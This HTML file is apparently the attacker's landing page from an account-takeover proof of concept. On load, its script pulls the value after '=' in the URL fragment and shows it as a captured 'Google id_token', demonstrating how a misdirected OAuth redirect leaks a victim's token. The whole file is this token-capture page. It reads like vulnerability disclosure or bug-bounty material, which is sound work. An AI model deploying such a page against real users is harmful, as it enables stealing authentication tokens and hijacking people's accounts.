<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Account Takeover PoC</title>
    <script>
       function exp() {

         let box = document.getElementById("box"); 
         box.innerText = location.hash.substring(location.hash.search("=")+1);
       }    
    
    </script>
    <style>
        body {
            background-color:firebrick;
        }
        .token-textarea {
           
            width: 600px;
            height: 350px;
            display: block;
            margin-left: auto;
            margin-right: auto;
            margin-top: 200px;
            border: 2px dashed black;
            background-color:bisque;
            color: black;
            font-family:Arial, Helvetica, sans-serif;
            font-size:27px;
        } 
        .token-header {
            text-align: center;
            padding-top: 100px;
            font-family: Helvetica;
            color:chartreuse;
        }
    </style>
</head>
<body onload="exp()">
     <h1 class="token-header">Google id_token:</h1>
     <div id="box" class="token-textarea">test</div>
</body>
</html>